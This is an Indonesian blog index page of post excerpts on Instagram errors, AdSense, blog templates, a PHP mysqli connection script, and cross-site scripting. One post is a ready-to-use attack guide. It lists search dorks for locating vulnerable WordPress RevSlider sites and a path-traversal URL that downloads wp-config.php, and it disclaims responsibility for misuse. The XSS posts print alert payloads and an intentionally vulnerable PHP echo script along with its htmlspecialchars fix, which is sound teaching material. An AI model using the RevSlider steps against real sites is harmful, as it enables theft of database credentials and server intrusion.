Penyebab Aplikasi Instagram Sering Error Yang Perlu Diketahui

Namun seiring berjalannya waktu aplikasi instagram ini malah sering error. Seperti salah satunya yang sering dirasakan masalah errornya yaitu video pada boomerang instastory patah-patah serta masih banyak masalah error lainya.
Tentu saja jika fitur-fitur instagram banyak yang error akan mengurangi rasa kenyamanan ketika menggunakan aplikasi instagram ini.
Tentu apabila instagram error, pasti

Read More

Web-web Besar Mulai Menonaktifkan Kolom Komentarnya

Seperti kita ketahui bahwa nofollow pada komentar hanya pada URL profil user saja, sementara pesan komentar spam atau off-topic tetap terbaca oleh robot perayap. Dan jika kita memonetise blog dengan Adsense, tentu saja komentar-komentar spam dan off-topic akan dapat mempengaruhi iklan. Lebih parahnya, bisa saja iklan tidak akan ditampilkan di halaman tersebut.
Jika kita bersikeras menggunakan

Read More

Kesalahan Saya Ketika Awal-awal Ngeblog

Kemudian ketika saya sudah sedikit paham tentang cara ngeblog seperti cara posting, upload gambar dan mengganti template, di situlah saya mulai melakukan kesalahan dan terlalu fokus pada sesuatu yang sebenarnya tidak terlalu penting, kesalahan yang saya lakukan ini mungkin 90% blogger pemula pasti pernah melakukan ini.

1. Terlalu Kreatif
Kesalahan yang pertama adalah terlalu kreatif, kenapa

Read More

Testimoni Diterima Adsense Subdomain Blogspot dengan Template Kompi Flexible

Alhamdulillah, senang sekali akhirnya bisa kembali diterima Adsense untuk menjadi penayang iklan di blog saya berjudul ABIHP yang mana telah 1 bulan habis kena banned karena kesalahan yang saya buat yang baru saya sadari belakangan ini. Dan tentunya Template dari Kang Adhy ini menjadi salah satu bagian diterimanya kembali blog saya oleh adsense.

Cerita Adsense Saya

Tahun 2011 mendapatkan akun

Read More

Script Connect Database PHP Mysqli

Script Connect Database PHP Mysqli - Saat saya mencoba menjalankan config dengan mysql php di mamp terjadi error karena mysql tidak dapat digunakan untuk php versi 5 keatas sedangkan mamp saya phpnya sudah versi 7 dan saya mendapat jawaban dari seseorang yang ada di forum IndoXploit Coders Team "Coba gunakan mysqli" ungkapnya, lalu langsung saya coba deh dan ternyata berhasil.

Jadi kesimpulannya mysqli dapat digunakan untuk php versi 5 keatas dan karena itu juga yang membuat saya ingin menulis artikel ini. Oke langsung aja comot scriptnya dibawah.

<?php
$dbhost = 'localhost';
$dbuser = 'root';
$dbpass = '';
$dbname = 'database_kita';
$connect = new mysqli($dbhost,$dbuser,$dbpass,$dbname);
if ($connect->connect_error) {
   die('Maaf koneksi gagal: '. $connect->connect_error);
}
?>

Sekian, semoga artikel ini bermanfaat :)

Read More

Exploit Wordpress Revslider Arbritary File Download Vulnerability

Naufal Ardhani - Halo sobat kali ini saya akan membahas Exploit Wordpress Revslider Arbritary File Download pada exploit ini anda dapat mendownload file file penting yang ada di dalam server web tersebut khususnya web yang menggunakan cms Wordpress tapi tidak semua web yang menggunakan cms tersebut rentan dengan exploit ini.

Menurut hasil yang saya dapatkan dari Exploit DB exploit ini ditemukan oleh Claudio Viviani pada tahun 2014, ia merupakan pemilik blog https://www.homelab.it/ yang berisi tentang security.

Dork :

• inurl:wp-content/plugins/revslider/
• inurl:revslider
• inurl:revslider_admin.php
• inurl:revslider_front.php
• inurl:plugins/revslider/
• intext:Powered by Revslider
• intitle:"Index Of/ revslider"
• intitle:"Index Of/wp-content/themes/revslider"
• intitle:"Index Of/wp-content/plugins/revslider"
• intitle:"Index Of/admin/revslider"
• intitle:"Index Of/fr/revslider"
• intitle:"Index Of/en/revslider"
• intitle:"Index Of/us/revslider"
• intitle:"Index Of/ar/revslider"
• intitle:"Index Of/es/revslider"
• intitle:"Index Of/de/revslider"

Exploit :

• /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Step :

1. Dorking dengan dork yang sudah disediakan.
2. Disini saya sudah memiliki target yang vuln/rentan tinggal kasih exploit, contoh : http://site.co.id/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
3. Dan jika berhasil admin-ajax.php terdownload lalu buka dengan text editor.

Sekian saja Exploit Wordpress Revslider Arbitary File Download Vulnerability yang saya bagikan semoga bermanfaat dan saya tidak bertanggung atas apa yang anda lakukan terimakasih.

Read More

Contoh Script Bug XSS dan Tutorial Patch Bug XSS

Naufal Ardhani - Di postingan sebelumnya saya sudah membuat artikel Pengertian XSS bagi yang belom tau apa itu XSS silahkan dibaca, Bagi seorang Web Developer sangat penting mengetahui hal seperti ini supaya keamanan websitenya terjaga dan kali ini saya akan memberikan contoh script  bagaimana terjadinya bug XSS dan cara mengatasi bug XSS.

Payload :

• <script>alert(1)</script>
• <script>alert("XSS!!!")</script>

Bagaimana XSS bisa terjadi? cek dibawah


Sebelum lanjut membaca siapkan terlebih dahulu localhost anda untuk menjalankan script XSS,

<?php 
   $url = $_GET["kata"]; 
   echo $url; 
?>

Script diatas merupakan script XSS yang terjadi pada url dan ini sangat simple tidak ada HTML ataupun CSS karena hanya untuk belajar saja hehe.


Simpan script xss dengan nama xss.php dan silahkan hidupkan localhost anda lalu buka script xss,

• http://localhost:8888/xss.php (dihalaman ini kosong hehe)
• dan untuk memunculkan text pada halaman tersebut anda tinggal tambahkan parameter ?kata= dan isinya, contoh : http://localhost:8888/xss.php?kata=naufalardhani.com ganti text berwarna biru dengan payload.

Nah itu adalah 2 hasil payload yang saya gunakan.

Lanjut kita bahas cara menambal bug XSS.

• Tambahkan htmlspecialchars() seperti dibawah agar html tidak dapat berjalan dengan sempurna.

<?php 
   $url = $_GET["kata"]; 
   echo htmlspecialchars($url); 
?>

• Lalu kita save dan jalankan.

Berhasil! script html sudah tidak berjalan karena sudah di filter dengan htmlspecialchars().


Terimakasih telah membaca Contoh Script Bug XSS dan Tutorial Patch Bug XSS di blog saya, semoga bermanfaat :)

Jika ada yang tidak dipahami silahkan tanya saja di kolom komentar.

Read More

Pengertian XSS

Naufal Ardhani - Cross Site Scripting XSS adalah salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya.

Mengapa Cross Site Scripting disingkat XSS bukannya CSS? Karna Singkatan CSS sudah digunakan untuk cascade style sheet.


Bingung script XSS seperti apa? silahkan lihat DISINI.

Tipe XSS

• Reflected
• Stored

Reflected XSS
Reflected XSS merupakan tipe XSS yang paling umum dan yang paling mudah dilakukan oleh penyerang. Penyerang menggunakan social engineering agar tautan dengan kode berbahaya ini diklik oleh pengguna. Dengan cara ini penyerang bisa mendapatkan cookie pengguna yang bisa digunakan selanjutnya untuk membajak session pengguna.

Mekanisme pertahanan menghadapi serangan ini adalah dengan melakukan validasi input sebelum menampilkan data apapun yang di-generate oleh pengguna. Jangan percayai apapun data yang dikirim oleh pengguna.

Contoh penyerangan menggunakan XSS (Nama – nama yang saya pakai merupakan karangan) :

1. Toni sering mengunjungi website jack, yang di website tersebut memungkinkan toni untuk memasukan username/password dan menyimpan data pribadi atau data transaksi yang seharusnya tidak boleh diketahui orang lain.

2. Rey mengetahui bahwa toni sering mengunjungi web tersebut, dan lalu mengamati jika di website buatan Jack terdapat kerentanan atau celah yang bisa diserang menggunakan xss

3. Rey lalu mengekplore dan mencoba mencari celahnya dan membuat script berbahaya dan kemudian di embed atau dimasukan ke dalam sbuah URL

4. Rey lalu mengirim email ke toni yang berisi link ke halaman web jack yang sebenernya urlnya sudah di embed script yang berbahaya tersebut, serta merayunya dengan alasan palsu atau sejenisnya.

5. saat Toni click URL tersebut maka toni akan masuk ke dalam website jack serta script yang sudah rey buat akan dijalankan, sehingga rey bisa mengmbil data dari cookienya dan bisa memanfaatkanya.


Stored XSS
Stored XSS lebih jarang ditemui dan dampak serangannya lebih besar. Sebuah serangan stored XSS dapat berakibat pada seluruh pengguna. Stored XSS terjadi saat pengguna diizinkan untuk memasukkan data yang akan ditampilkan kembali. Contohnya adalah pada message board, buku tamu, dll. Penyerang memasukkan kode HTML atau client script code lainnya pada posting mereka.


Sekian saja artikel yang tentang pengertian XSS semoga ada dapat memahami dengan mudah dan jangan lupa berkomentar dibawah.

Referensi :
https://upyes.wordpress.com/2013/05/18/pengertian-xss/
https://en.wikipedia.org/wiki/Cross-site_scripting

Read More

Latar Belakang Pendidikan Seorang Blogger Tidak Menentukan Peringkat Blog

Tapi satu yang saya tahu, pengalaman lebih diutamakan daripada pendidikan setinggi langit yang menurut saya hanya membuang buang waktu, dan menjadi alasan anda untuk mundur secara sengaja dan lari dari tanggung jawab utama. Bekerja!.
Dalam blogger pun seperti itu, pengalaman setiap orang dalam meraih kesuksesan berbeda-beda. Ada yang baru 1 tahun bisa langsung sukses (tapi bohong), ada yang

Read More

Alasan Kenapa Harus Pindah Ke Template Kompi Magazine

Template kompi yang saya sukai adalah kompi minimalis, kompi flexible, kompi males dan yang paling mendominasi saya sukai ialah kompi magazine yang memuat tampilan blog berita namun masih terlihat modern, elegan dan terkesan enak dipandang.
Menurut saya, template ini sudah tidak ada duanya bahkan saya sempet ganti ke template buatan selain kompi, malah tidak srek dan tidak nyaman baik di user

Read More

Review Template Kompi Text Aja Dari Blog Amtread

Mulai dari mencari backlink sana-sini, penerapkan semua ilmu seo, update secara rutin, sampai setting-setting template supaya kelihatan keren dan akhirnya semua berakhir dengan kata nihil. Tidak ada hasil yang saya dapatkan. Saya hanya merasa capek dan mendapatkan rasa putus asa.
Sampai pada akhirnya rival blog saya yaitu Bang Rama memberi tahu bahwa template yang fast loading lah yang akan

Read More

Iklan Dewasa Di Adsense Muncul Lagi Setelah Diblock? Ini Dia Alasannya

Sebenarnya tidak ada yang salah dengan Anda selaku publisher Adsense. Yang salah yaitu yang melihat iklan-iklan tersebut.
Iklan-iklan dewasa ini muncul karena histori browsing pengunjung blog. Konten iklan Adsense itu akan menyesuaikan dengan ketertarikan pengunjung blog, selain dari isi konten blog. Hal inilah yang dimanfaatkan para advertiser nakal untuk menarik pengguna internet.
Padahal

Read More